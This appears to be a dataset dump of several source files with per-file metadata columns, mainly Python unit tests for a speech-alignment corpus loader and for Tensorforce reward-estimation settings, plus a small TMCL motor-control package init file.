output_directory = os.path.join(generated_dir, 'basic')
if os.path.exists(output_directory):
shutil.rmtree(output_directory, ignore_errors=True)
c = AlignableCorpus(basic_corpus_dir, output_directory, use_mp=True)
assert 'test_add' not in c.utt_speak_mapping
c.add_utterance('test_add', 'new_speaker', 'test_add', 'blah blah', 'wav_path')
assert 'test_add' in c.utt_speak_mapping
assert c.speak_utt_mapping['new_speaker'] == ['test_add']
assert c.file_utt_mapping['test_add'] == ['test_add']
assert c.text_mapping['test_add'] == 'blah blah'
c.delete_utterance('test_add')
assert 'test_add' not in c.utt_speak_mapping
assert 'new_speaker' not in c.speak_utt_mapping
assert 'test_add' not in c.file_utt_mapping
assert 'test_add' not in c.text_mapping
def test_basic(basic_dict_path, basic_corpus_dir, generated_dir, default_feature_config):
output_directory = os.path.join(generated_dir, 'basic')
if os.path.exists(output_directory):
shutil.rmtree(output_directory, ignore_errors=True)
dictionary = Dictionary(basic_dict_path, output_directory)
dictionary.write()
c = AlignableCorpus(basic_corpus_dir, output_directory, use_mp=True)
c.initialize_corpus(dictionary)
default_feature_config.generate_features(c)
assert c.get_feat_dim(default_feature_config) == 39
dictionary.cleanup_logger()
def test_basic_txt(basic_corpus_txt_dir, basic_dict_path, generated_dir, default_feature_config):
output_directory = os.path.join(generated_dir, 'basic')
if os.path.exists(output_directory):
shutil.rmtree(output_directory, ignore_errors=True)
dictionary = Dictionary(basic_dict_path, os.path.join(generated_dir, 'basic'))
dictionary.write()
c = AlignableCorpus(basic_corpus_txt_dir, output_directory, use_mp=False)
print(c.no_transcription_files)
assert len(c.no_transcription_files) == 0
c.initialize_corpus(dictionary)
default_feature_config.generate_features(c)
assert c.get_feat_dim(default_feature_config) == 39
dictionary.cleanup_logger()
def test_alignable_from_temp(basic_corpus_txt_dir, basic_dict_path, generated_dir, default_feature_config):
dictionary = Dictionary(basic_dict_path, os.path.join(generated_dir, 'basic'))
dictionary.write()
output_directory = os.path.join(generated_dir, 'basic')
if os.path.exists(output_directory):
shutil.rmtree(output_directory, ignore_errors=True)
c = AlignableCorpus(basic_corpus_txt_dir, output_directory, use_mp=False)
assert len(c.no_transcription_files) == 0
c.initialize_corpus(dictionary)
default_feature_config.generate_features(c)
assert c.get_feat_dim(default_feature_config) == 39
c = AlignableCorpus(basic_corpus_txt_dir, output_directory, use_mp=False)
assert len(c.no_transcription_files) == 0
c.initialize_corpus(dictionary)
default_feature_config.generate_features(c)
assert c.get_feat_dim(default_feature_config) == 39
dictionary.cleanup_logger()
def test_transcribe_from_temp(basic_corpus_txt_dir, basic_dict_path, generated_dir, default_feature_config):
dictionary = Dictionary(basic_dict_path, os.path.join(generated_dir, 'basic'))
dictionary.write()
output_directory = os.path.join(generated_dir, 'basic')
if os.path.exists(output_directory):
shutil.rmtree(output_directory, ignore_errors=True)
c = TranscribeCorpus(basic_corpus_txt_dir, output_directory, use_mp=False)
c.initialize_corpus(dictionary)
default_feature_config.generate_features(c)
assert c.get_feat_dim(default_feature_config) == 39
c = TranscribeCorpus(basic_corpus_txt_dir, output_directory, use_mp=False)
c.initialize_corpus(dictionary)
default_feature_config.generate_features(c)
assert c.get_feat_dim(default_feature_config) == 39
dictionary.cleanup_logger()
def test_extra(sick_dict, extra_corpus_dir, generated_dir):
output_directory = os.path.join(generated_dir, 'extra')
if os.path.exists(output_directory):
shutil.rmtree(output_directory, ignore_errors=True)
corpus = AlignableCorpus(extra_corpus_dir, output_directory, num_jobs=2, use_mp=False)
corpus.initialize_corpus(sick_dict)
def test_stereo(basic_dict_path, stereo_corpus_dir, temp_dir, default_feature_config):
temp = os.path.join(temp_dir, 'stereo')
if os.path.exists(temp):
shutil.rmtree(temp, ignore_errors=True)
dictionary = Dictionary(basic_dict_path, os.path.join(temp, 'basic'))
dictionary.write()
d = AlignableCorpus(stereo_corpus_dir, temp, use_mp=False)
d.initialize_corpus(dictionary)
default_feature_config.generate_features(d)
assert d.get_feat_dim(default_feature_config) == 39
dictionary.cleanup_logger()
def test_stereo_short_tg(basic_dict_path, stereo_corpus_short_tg_dir, temp_dir, default_feature_config):
temp = os.path.join(temp_dir, 'stereo_tg')
if os.path.exists(temp):
shutil.rmtree(temp, ignore_errors=True)
dictionary = Dictionary(basic_dict_path, os.path.join(temp, 'basic'))
dictionary.write()
d = AlignableCorpus(stereo_corpus_short_tg_dir, temp, use_mp=False)
d.initialize_corpus(dictionary)
default_feature_config.generate_features(d)
assert d.get_feat_dim(default_feature_config) == 39
dictionary.cleanup_logger()
def test_flac(basic_dict_path, flac_corpus_dir, temp_dir, default_feature_config):
temp = os.path.join(temp_dir, 'flac')
if os.path.exists(temp):
shutil.rmtree(temp, ignore_errors=True)
dictionary = Dictionary(basic_dict_path, os.path.join(temp, 'basic'))
dictionary.write()
d = AlignableCorpus(flac_corpus_dir, temp, use_mp=False)
d.initialize_corpus(dictionary)
default_feature_config.generate_features(d)
assert d.get_feat_dim(default_feature_config) == 39
dictionary.cleanup_logger()
def test_audio_directory(basic_dict_path, basic_split_dir, temp_dir, default_feature_config):
temp = os.path.join(temp_dir, 'audio_dir_test')
audio_dir, text_dir = basic_split_dir
if os.path.exists(temp):
shutil.rmtree(temp, ignore_errors=True)
dictionary = Dictionary(basic_dict_path, os.path.join(temp, 'basic'))
dictionary.write()
d = AlignableCorpus(text_dir, temp, use_mp=False, audio_directory=audio_dir)
assert len(d.no_transcription_files) == 0
assert len(d.utt_wav_mapping) > 0
d.initialize_corpus(dictionary)
default_feature_config.generate_features(d)
assert d.get_feat_dim(default_feature_config) == 39
if os.path.exists(temp):
shutil.rmtree(temp, ignore_errors=True)
dictionary = Dictionary(basic_dict_path, os.path.join(temp, 'basic'))
dictionary.write()
d = AlignableCorpus(text_dir, temp, use_mp=True, audio_directory=audio_dir)
assert len(d.no_transcription_files) == 0
assert len(d.utt_wav_mapping) > 0
d.initialize_corpus(dictionary)
default_feature_config.generate_features(d)
assert d.get_feat_dim(default_feature_config) == 39
dictionary.cleanup_logger()
def test_flac_mp(basic_dict_path, flac_corpus_dir, temp_dir, default_feature_config):
temp = os.path.join(temp_dir, 'flac')
if os.path.exists(temp):
shutil.rmtree(temp, ignore_errors=True)
dictionary = Dictionary(basic_dict_path, os.path.join(temp, 'basic'))
dictionary.write()
d = AlignableCorpus(flac_corpus_dir, temp, use_mp=True)
d.initialize_corpus(dictionary)
default_feature_config.generate_features(d)
assert d.get_feat_dim(default_feature_config) == 39
dictionary.cleanup_logger()
def test_flac_tg(basic_dict_path, flac_tg_corpus_dir, temp_dir, default_feature_config):
temp = os.path.join(temp_dir, 'flac')
if os.path.exists(temp):
shutil.rmtree(temp, ignore_errors=True)
dictionary = Dictionary(basic_dict_path, os.path.join(temp, 'basic'))
dictionary.write()
d = AlignableCorpus(flac_tg_corpus_dir, temp, use_mp=False)
d.initialize_corpus(dictionary)
default_feature_config.generate_features(d)
assert d.get_feat_dim(default_feature_config) == 39
dictionary.cleanup_logger()
def test_flac_tg_mp(basic_dict_path, flac_tg_corpus_dir, temp_dir, default_feature_config):
temp = os.path.join(temp_dir, 'flac')
if os.path.exists(temp):
shutil.rmtree(temp, ignore_errors=True)
dictionary = Dictionary(basic_dict_path, os.path.join(temp, 'basic'))
dictionary.write()
d = AlignableCorpus(flac_tg_corpus_dir, temp, use_mp=True)
d.initialize_corpus(dictionary)
default_feature_config.generate_features(d)
assert d.get_feat_dim(default_feature_config) == 39
dictionary.cleanup_logger()
def test_flac_tg_transcribe(basic_dict_path, flac_tg_corpus_dir, temp_dir, default_feature_config):
temp = os.path.join(temp_dir, 'flac')
if os.path.exists(temp):
shutil.rmtree(temp, ignore_errors=True)
dictionary = Dictionary(basic_dict_path, os.path.join(temp, 'basic'))
dictionary.write()
d = TranscribeCorpus(flac_tg_corpus_dir, temp, use_mp=False)
d.initialize_corpus(dictionary)
default_feature_config.generate_features(d)
assert d.get_feat_dim(default_feature_config) == 39
dictionary.cleanup_logger()
if os.path.exists(temp):
shutil.rmtree(temp, ignore_errors=True)
dictionary = Dictionary(basic_dict_path, os.path.join(temp, 'basic'))
dictionary.write()
d = TranscribeCorpus(flac_tg_corpus_dir, temp, use_mp=True)
d.initialize_corpus(dictionary)
default_feature_config.generate_features(d)
assert d.get_feat_dim(default_feature_config) == 39
dictionary.cleanup_logger()
def test_flac_transcribe(basic_dict_path, flac_transcribe_corpus_dir, temp_dir, default_feature_config):
temp = os.path.join(temp_dir, 'flac')
if os.path.exists(temp):
shutil.rmtree(temp, ignore_errors=True)
dictionary = Dictionary(basic_dict_path, os.path.join(temp, 'basic'))
dictionary.write()
d = TranscribeCorpus(flac_transcribe_corpus_dir, temp, use_mp=True)
d.initialize_corpus(dictionary)
default_feature_config.generate_features(d)
assert d.get_feat_dim(default_feature_config) == 39
dictionary.cleanup_logger()
if os.path.exists(temp):
shutil.rmtree(temp, ignore_errors=True)
dictionary = Dictionary(basic_dict_path, os.path.join(temp, 'basic'))
dictionary.write()
d = TranscribeCorpus(flac_transcribe_corpus_dir, temp, use_mp=False)
d.initialize_corpus(dictionary)
default_feature_config.generate_features(d)
assert d.get_feat_dim(default_feature_config) == 39
dictionary.cleanup_logger()
def test_24bit_wav(transcribe_corpus_24bit_dir, temp_dir, default_feature_config):
temp = os.path.join(temp_dir, '24bit')
if os.path.exists(temp):
shutil.rmtree(temp, ignore_errors=True)
c = TranscribeCorpus(transcribe_corpus_24bit_dir, temp, use_mp=False)
assert len(c.unsupported_bit_depths) == 0
c.initialize_corpus()
default_feature_config.generate_features(c)
assert c.get_feat_dim(default_feature_config) == 39
assert len(c.utt_wav_mapping) == 2
def test_short_segments(basic_dict_path, shortsegments_corpus_dir, temp_dir, default_feature_config):
temp = os.path.join(temp_dir, 'short_segments')
if os.path.exists(temp):
shutil.rmtree(temp, ignore_errors=True)
dictionary = Dictionary(basic_dict_path, temp)
dictionary.write()
corpus = AlignableCorpus(shortsegments_corpus_dir, temp, use_mp=False)
corpus.initialize_corpus(dictionary)
default_feature_config.generate_features(corpus)
assert len(corpus.feat_mapping.keys()) == 1
assert len(corpus.utt_speak_mapping.keys()) == 3
assert len(corpus.speak_utt_mapping.keys()) == 1
assert len(corpus.text_mapping.keys()) == 3
assert len(corpus.utt_wav_mapping.keys()) == 1
assert len(corpus.segments.keys()) == 3
print(corpus.segments)
print(corpus.ignored_utterances)
assert len(corpus.ignored_utterances) == 2
dictionary.cleanup_logger()
def test_speaker_groupings(large_prosodylab_format_directory, temp_dir, large_dataset_dictionary, default_feature_config):
output_directory = os.path.join(temp_dir, 'large')
if os.path.exists(output_directory):
shutil.rmtree(output_directory, ignore_errors=True)
dictionary = Dictionary(large_dataset_dictionary, output_directory)
dictionary.write()
c = AlignableCorpus(large_prosodylab_format_directory, output_directory, use_mp=False)
c.initialize_corpus(dictionary)
default_feature_config.generate_features(c)
speakers = os.listdir(large_prosodylab_format_directory)
for s in speakers:
assert any(s in x for x in c.speaker_groups)
for root, dirs, files in os.walk(large_prosodylab_format_directory):
for f in files:
name, ext = os.path.splitext(f)
assert any(name in x for x in c.groups)
for root, dirs, files in os.walk(large_prosodylab_format_directory):
for f in files:
name, ext = os.path.splitext(f)
assert any(name in x for x in c.feat_mapping)
shutil.rmtree(output_directory, ignore_errors=True)
dictionary.write()
c = AlignableCorpus(large_prosodylab_format_directory, output_directory, num_jobs=2, use_mp=False)
c.initialize_corpus(dictionary)
default_feature_config.generate_features(c)
for s in speakers:
assert any(s in x for x in c.speaker_groups)
for root, dirs, files in os.walk(large_prosodylab_format_directory):
for f in files:
name, ext = os.path.splitext(f)
assert any(name in x for x in c.groups)
for root, dirs, files in os.walk(large_prosodylab_format_directory):
for f in files:
name, ext = os.path.splitext(f)
assert any(name in x for x in c.feat_mapping)
dictionary.cleanup_logger()
def test_subset(large_prosodylab_format_directory, temp_dir, large_dataset_dictionary, default_feature_config):
output_directory = os.path.join(temp_dir, 'large_subset')
shutil.rmtree(output_directory, ignore_errors=True)
dictionary = Dictionary(large_dataset_dictionary, output_directory)
dictionary.write()
c = AlignableCorpus(large_prosodylab_format_directory, output_directory, use_mp=False)
c.initialize_corpus(dictionary)
sd = c.split_directory()
default_feature_config.generate_features(c)
s = c.subset_directory(10, default_feature_config)
assert os.path.exists(sd)
assert os.path.exists(s)
dictionary.cleanup_logger()
def test_weird_words(weird_words_dir, temp_dir, sick_dict_path):
output_directory = os.path.join(temp_dir, 'weird_words')
shutil.rmtree(output_directory, ignore_errors=True)
dictionary = Dictionary(sick_dict_path, output_directory)
assert 'i’m' not in dictionary.words
assert '’m' not in dictionary.words
assert dictionary.words["i'm"][0]['pronunciation'] == ('ay', 'm', 'ih')
assert dictionary.words["i'm"][1]['pronunciation'] == ('ay', 'm')
assert dictionary.words["'m"][0]['pronunciation'] == ('m',)
dictionary.write()
c = AlignableCorpus(weird_words_dir, output_directory, use_mp=False)
c.initialize_corpus(dictionary)
print(c.utterance_oovs['weird-words'])
assert c.utterance_oovs['weird-words'] == ['talking-ajfish', 'asds-asda', 'sdasd-me']
dictionary.set_word_set(c.word_set)
for w in ["i'm", "this'm", "sdsdsds'm", "'m"]:
_ = dictionary.to_int(w)
print(dictionary.oovs_found)
assert "'m" not in dictionary.oovs_found
dictionary.cleanup_logger()
def test_punctuated(punctuated_dir, temp_dir, sick_dict_path):
output_directory = os.path.join(temp_dir, 'weird_words')
shutil.rmtree(output_directory, ignore_errors=True)
dictionary = Dictionary(sick_dict_path, output_directory)
dictionary.write()
c = AlignableCorpus(punctuated_dir, output_directory, use_mp=False)
c.initialize_corpus(dictionary)
print(c.text_mapping['punctuated'])
assert c.text_mapping['punctuated'] == 'oh yes they they you know they love her and so i mean'
dictionary.cleanup_logger()
def test_alternate_punctuation(punctuated_dir, temp_dir, sick_dict_path, different_punctuation_config):
train_config, align_config = train_yaml_to_config(different_punctuation_config)
output_directory = os.path.join(temp_dir, 'weird_words')
shutil.rmtree(output_directory, ignore_errors=True)
print(align_config.punctuation)
dictionary = Dictionary(sick_dict_path, output_directory, punctuation=align_config.punctuation)
dictionary.write()
c = AlignableCorpus(punctuated_dir, output_directory, use_mp=False, punctuation=align_config.punctuation)
print(c.punctuation)
c.initialize_corpus(dictionary)
print(c.text_mapping['punctuated'])
assert c.text_mapping['punctuated'] == 'oh yes, they they, you know, they love her and so i mean'
dictionary.cleanup_logger()
| 43.123153
| 122
| 0.75257
| 2,433
| 17,508
| 5.095356
| 0.066995
| 0.030975
| 0.096798
| 0.031621
| 0.85795
| 0.817214
| 0.788739
| 0.78156
| 0.762201
| 0.756715
| 0
| 0.004821
| 0.146904
| 17,508
| 406
| 123
| 43.123153
| 0.825187
| 0
| 0
| 0.669591
| 0
| 0
| 0.038666
| 0
| 0
| 0
| 0
| 0
| 0.181287
| 1
| 0.067251
| false
| 0
| 0.020468
| 0
| 0.087719
| 0.026316
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
b9a8111ecf1843f817957335691cb6b160c3164e
| 177
|
py
|
Python
|
TMCL/__init__.py
|
NativeDesign/python-tmcl
|
7d79359274ef7e59ca561a1bf474e94bfdc5973c
|
[
"MIT"
] | 13
|
2017-07-14T07:51:19.000Z
|
2021-06-14T10:18:17.000Z
|
TMCL/__init__.py
|
NativeDesign/python-tmcl
|
7d79359274ef7e59ca561a1bf474e94bfdc5973c
|
[
"MIT"
] | 16
|
2017-07-18T09:13:34.000Z
|
2022-01-15T07:39:56.000Z
|
TMCL/__init__.py
|
NativeDesign/python-tmcl
|
7d79359274ef7e59ca561a1bf474e94bfdc5973c
|
[
"MIT"
] | 10
|
2017-01-10T17:43:48.000Z
|
2022-03-30T11:44:56.000Z
|
from .bus import Bus
from .motor import Motor
from .commands import Command
from .reply import Reply
def connect ( serial_port, CAN = False ):
return Bus(serial_port, CAN)
| 22.125
| 41
| 0.751412
| 27
| 177
| 4.851852
| 0.518519
| 0.152672
| 0.198473
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.180791
| 177
| 7
| 42
| 25.285714
| 0.903448
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.166667
| false
| 0
| 0.666667
| 0.166667
| 1
| 0
| 1
| 0
| 0
| null | 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 1
| 0
|
0
| 6
|
b9afe7b6c36b45ebaece996725ec7dd69464be30
| 63
|
py
|
Python
|
signal_logger_ui/test/test_signal_logger_ui.py
|
mcx/signal_logger
|
7d209bb42ae563fe78175f4b52a8f5c648984a39
|
[
"BSD-3-Clause"
] | null | null | null |
signal_logger_ui/test/test_signal_logger_ui.py
|
mcx/signal_logger
|
7d209bb42ae563fe78175f4b52a8f5c648984a39
|
[
"BSD-3-Clause"
] | 4
|
2019-07-09T08:49:38.000Z
|
2021-09-13T11:26:02.000Z
|
signal_logger_ui/test/test_signal_logger_ui.py
|
mcx/signal_logger
|
7d209bb42ae563fe78175f4b52a8f5c648984a39
|
[
"BSD-3-Clause"
] | 3
|
2020-05-28T08:50:03.000Z
|
2022-03-27T12:54:55.000Z
|
import signal_logger_ui
def test_placeholder():
assert True
| 15.75
| 23
| 0.809524
| 9
| 63
| 5.333333
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.142857
| 63
| 4
| 24
| 15.75
| 0.888889
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.333333
| 1
| 0.333333
| true
| 0
| 0.333333
| 0
| 0.666667
| 0
| 1
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 6
|
b9dc0df31309f5eb24cb2c055d9194cf73ff1aa4
| 13,013
|
py
|
Python
|
test/test_reward_estimation.py
|
BaiLiping/BLPtensorforce
|
01bc0b7130a497c9dfff9caa2fd5df919ffe7552
|
[
"Apache-2.0"
] | 1
|
2021-12-25T16:54:16.000Z
|
2021-12-25T16:54:16.000Z
|
test/test_reward_estimation.py
|
BaiLiping/BLPtensorforce
|
01bc0b7130a497c9dfff9caa2fd5df919ffe7552
|
[
"Apache-2.0"
] | null | null | null |
test/test_reward_estimation.py
|
BaiLiping/BLPtensorforce
|
01bc0b7130a497c9dfff9caa2fd5df919ffe7552
|
[
"Apache-2.0"
] | null | null | null |
# Copyright 2020 Tensorforce Team. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
import unittest
from test.unittest_base import UnittestBase
class TestRewardEstimation(UnittestBase, unittest.TestCase):
agent = dict(
policy=dict(network=dict(type='auto', size=8, depth=1, rnn=2), distributions=dict(
int_action2=dict(type='categorical', temperature_mode='predicted'),
int_action3=dict(type='categorical', temperature_mode='global'),
gaussian_action2=dict(type='gaussian', stddev_mode='global'),
gaussian_action3=dict(
type='gaussian', stddev_mode='global', bounded_transform='clipping'
), beta_action='beta'
)), update=4, optimizer=dict(optimizer='adam', learning_rate=1e-3),
objective='policy_gradient', reward_estimation=dict(
horizon=3, estimate_advantage=True, predict_horizon_values='late',
return_processing=dict(type='clipping', lower=-1.0, upper=1.0),
advantage_processing='batch_normalization'
), l2_regularization=0.01, entropy_regularization=0.01,
state_preprocessing='linear_normalization',
reward_preprocessing=dict(type='clipping', lower=-1.0, upper=1.0),
exploration=0.01, variable_noise=0.01,
config=dict(device='CPU', eager_mode=True, create_debug_assertions=True, tf_log_level=20),
tracking='all'
)
def test_no_horizon_estimate(self):
self.start_tests(name='no horizon estimate')
# shortest horizon
reward_estimation = dict(
horizon=1, discount=0.99, predict_horizon_values=False,
return_processing='batch_normalization'
)
self.unittest(reward_estimation=reward_estimation)
# horizon as long as episode
reward_estimation = dict(
horizon=10, discount=0.99, predict_horizon_values=False,
return_processing='batch_normalization'
)
self.unittest(reward_estimation=reward_estimation)
# episode horizon
reward_estimation = dict(
horizon='episode', discount=0.99, predict_horizon_values=False,
return_processing='batch_normalization'
)
self.unittest(reward_estimation=reward_estimation)
def test_early_horizon_estimate(self):
self.start_tests(name='early horizon estimate')
# TODO: action value doesn't exist for Beta
actions = dict(
bool_action=dict(type='bool', shape=(1,)),
int_action1=dict(type='int', shape=(), num_values=4),
int_action2=dict(type='int', shape=(2,), num_values=3),
int_action3=dict(type='int', shape=(2, 1), num_values=2),
gaussian_action1=dict(type='float', shape=(1, 2), min_value=1.0, max_value=2.0),
gaussian_action2=dict(type='float', shape=(1,), min_value=-2.0, max_value=1.0)
)
reward_estimation = dict(
horizon='episode', predict_horizon_values='early', predict_action_values=True,
return_processing='batch_normalization'
)
# Implicit baseline = policy
self.unittest(actions=actions, reward_estimation=reward_estimation, config=dict(
buffer_observe=3, device='CPU', eager_mode=True, create_debug_assertions=True,
tf_log_level=20
))
# TODO: action value doesn't exist for Beta
actions = dict(
bool_action=dict(type='bool', shape=(1,)),
int_action1=dict(type='int', shape=(), num_values=4),
int_action2=dict(type='int', shape=(2,), num_values=3),
int_action3=dict(type='int', shape=(2, 1), num_values=2),
gaussian_action1=dict(type='float', shape=(1, 2), min_value=1.0, max_value=2.0),
gaussian_action2=dict(type='float', shape=(1,), min_value=-2.0, max_value=1.0)
)
update = dict(unit='episodes', batch_size=1)
reward_estimation = dict(
horizon=3, predict_horizon_values='early', return_processing='batch_normalization'
)
# Implicit baseline = policy
baseline_optimizer = dict(optimizer='adam', learning_rate=1e-3)
baseline_objective = 'state_value'
self.unittest(
actions=actions, update=update, reward_estimation=reward_estimation,
baseline_optimizer=baseline_optimizer, baseline_objective=baseline_objective,
config=dict(
buffer_observe='episode', device='CPU', eager_mode=True,
create_debug_assertions=True, tf_log_level=20
) # or 1?
)
reward_estimation = dict(
horizon='episode', predict_horizon_values='early', predict_terminal_values=True,
return_processing='batch_normalization'
)
# TODO: baseline horizon has to be equal to policy horizon
baseline = dict(network=dict(type='auto', size=7, depth=1, rnn=2))
# Implicit baseline_optimizer = 1.0
baseline_objective = 'state_value'
self.unittest(
reward_estimation=reward_estimation, baseline=baseline,
baseline_objective=baseline_objective
)
# Action-value baseline compatible with discrete actions
actions = dict(
bool_action=dict(type='bool', shape=(1,)),
int_action1=dict(type='int', shape=(), num_values=4),
int_action2=dict(type='int', shape=(2,), num_values=3),
int_action3=dict(type='int', shape=(2, 1), num_values=2)
)
reward_estimation = dict(
horizon=3, predict_horizon_values='early', predict_action_values=True,
predict_terminal_values=True, return_processing='batch_normalization'
)
baseline = dict(network=dict(type='auto', size=7, depth=1, rnn=1))
baseline_optimizer = dict(optimizer='adam', learning_rate=1e-3)
baseline_objective = 'action_value'
self.unittest(
actions=actions, reward_estimation=reward_estimation, baseline=baseline,
baseline_optimizer=baseline_optimizer, baseline_objective=baseline_objective
)
def test_late_horizon_estimate(self):
self.start_tests(name='late horizon estimate')
# TODO: action value doesn't exist for Beta
actions = dict(
bool_action=dict(type='bool', shape=(1,)),
int_action1=dict(type='int', shape=(), num_values=4),
int_action2=dict(type='int', shape=(2,), num_values=3),
int_action3=dict(type='int', shape=(2, 1), num_values=2),
gaussian_action1=dict(type='float', shape=(1, 2), min_value=1.0, max_value=2.0),
gaussian_action2=dict(type='float', shape=(1,), min_value=-2.0, max_value=1.0)
)
reward_estimation = dict(
horizon=3, predict_horizon_values='late', return_processing='batch_normalization'
)
# Implicit baseline = policy
# Implicit baseline_optimizer = 1.0
baseline_objective = 'state_value'
self.unittest(
actions=actions, reward_estimation=reward_estimation,
baseline_objective=baseline_objective
)
# Action-value baseline compatible with discrete actions
actions = dict(
bool_action=dict(type='bool', shape=(1,)),
int_action1=dict(type='int', shape=(), num_values=4),
int_action2=dict(type='int', shape=(2,), num_values=3),
int_action3=dict(type='int', shape=(2, 1), num_values=2)
)
reward_estimation = dict(
horizon=3, predict_horizon_values='late', predict_action_values=True,
return_processing='batch_normalization'
)
# TODO: baseline horizon has to be equal to policy horizon
baseline = dict(network=dict(type='auto', size=7, depth=1, rnn=2))
baseline_optimizer = 2.0
baseline_objective = 'action_value'
self.unittest(
actions=actions, reward_estimation=reward_estimation, baseline=baseline,
baseline_optimizer=baseline_optimizer, baseline_objective=baseline_objective
)
# TODO: state value doesn't exist for Beta
actions = dict(
bool_action=dict(type='bool', shape=(1,)),
int_action1=dict(type='int', shape=(), num_values=4),
int_action2=dict(type='int', shape=(2,), num_values=3),
int_action3=dict(type='int', shape=(2, 1), num_values=2),
gaussian_action1=dict(type='float', shape=(1, 2), min_value=1.0, max_value=2.0),
gaussian_action2=dict(type='float', shape=(1,), min_value=-2.0, max_value=1.0)
)
reward_estimation = dict(
horizon=3, predict_horizon_values='late', predict_terminal_values=True,
return_processing='batch_normalization'
)
# Implicit baseline = policy
baseline_optimizer = dict(optimizer='adam', learning_rate=1e-3)
baseline_objective = 'state_value'
self.unittest(
actions=actions, reward_estimation=reward_estimation,
baseline_optimizer=baseline_optimizer, baseline_objective=baseline_objective
)
reward_estimation = dict(
horizon=3, predict_horizon_values='late', predict_action_values=True,
predict_terminal_values=True, return_processing='batch_normalization'
)
# TODO: baseline horizon has to be equal to policy horizon
# (Not specifying customized distributions since action value doesn't exist for Beta)
baseline = dict(
type='parametrized_distributions', network=dict(type='auto', size=7, depth=1, rnn=2)
)
baseline_optimizer = dict(optimizer='adam', learning_rate=1e-3)
baseline_objective = 'action_value'
self.unittest(
reward_estimation=reward_estimation, baseline=baseline,
baseline_optimizer=baseline_optimizer, baseline_objective=baseline_objective
)
def test_advantage_estimate(self):
self.start_tests(name='advantage estimate')
reward_estimation = dict(
horizon=3, estimate_advantage=True, predict_horizon_values=False,
return_processing=dict(type='clipping', lower=-1.0, upper=1.0),
advantage_processing='batch_normalization'
)
# TODO: baseline horizon has to be equal to policy horizon
baseline = dict(network=dict(type='auto', size=7, depth=1, rnn=2))
# Implicit advantage computation as part of loss
self.unittest(reward_estimation=reward_estimation, baseline=baseline)
# TODO: action value doesn't exist for Beta
actions = dict(
bool_action=dict(type='bool', shape=(1,)),
int_action1=dict(type='int', shape=(), num_values=4),
int_action2=dict(type='int', shape=(2,), num_values=3),
int_action3=dict(type='int', shape=(2, 1), num_values=2),
gaussian_action1=dict(type='float', shape=(1, 2), min_value=1.0, max_value=2.0),
gaussian_action2=dict(type='float', shape=(1,), min_value=-2.0, max_value=1.0)
)
reward_estimation = dict(
horizon='episode', estimate_advantage=True, predict_horizon_values='early',
predict_action_values=True,
return_processing=dict(type='clipping', lower=-1.0, upper=1.0),
advantage_processing='batch_normalization'
)
# Implicit baseline = policy
# Implicit baseline_optimizer = 1.0
baseline_objective = 'state_value'
self.unittest(
actions=actions, reward_estimation=reward_estimation,
baseline_objective=baseline_objective
)
reward_estimation = dict(
horizon=3, estimate_advantage=True, predict_horizon_values='late',
predict_terminal_values=True,
return_processing=dict(type='clipping', lower=-1.0, upper=1.0),
advantage_processing='batch_normalization'
)
baseline = dict(network=dict(type='auto', size=7, depth=1, rnn=1))
baseline_optimizer = dict(optimizer='adam', learning_rate=1e-3)
baseline_objective = 'state_value'
self.unittest(
reward_estimation=reward_estimation, baseline=baseline,
baseline_optimizer=baseline_optimizer, baseline_objective=baseline_objective
)
| 47.148551
| 98
| 0.64474
| 1,527
| 13,013
| 5.281598
| 0.128356
| 0.054557
| 0.028642
| 0.041662
| 0.843769
| 0.82579
| 0.807564
| 0.789461
| 0.769746
| 0.753875
| 0
| 0.025434
| 0.238608
| 13,013
| 275
| 99
| 47.32
| 0.788555
| 0.125644
| 0
| 0.593458
| 0
| 0
| 0.083083
| 0.002293
| 0
| 0
| 0
| 0.003636
| 0.014019
| 1
| 0.018692
| false
| 0
| 0.009346
| 0
| 0.037383
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 6
|
6a01eea73bef055220cb9d2dbac244a14ffe451c
| 12
|
bzl
|
Python
|
test/com/facebook/buck/parser/testdata/load_twice_from_bzl/b.bzl
|
jasonnam/buck
|
1ddbbf986312b30413aa36cac337267536a11f04
|
[
"Apache-2.0"
] | null | null | null |
test/com/facebook/buck/parser/testdata/load_twice_from_bzl/b.bzl
|
jasonnam/buck
|
1ddbbf986312b30413aa36cac337267536a11f04
|
[
"Apache-2.0"
] | null | null | null |
test/com/facebook/buck/parser/testdata/load_twice_from_bzl/b.bzl
|
jasonnam/buck
|
1ddbbf986312b30413aa36cac337267536a11f04
|
[
"Apache-2.0"
] | null | null | null |
z = 3
w = 4
| 4
| 5
| 0.333333
| 4
| 12
| 1
| 1
| 0
| 0
| 0
| 0
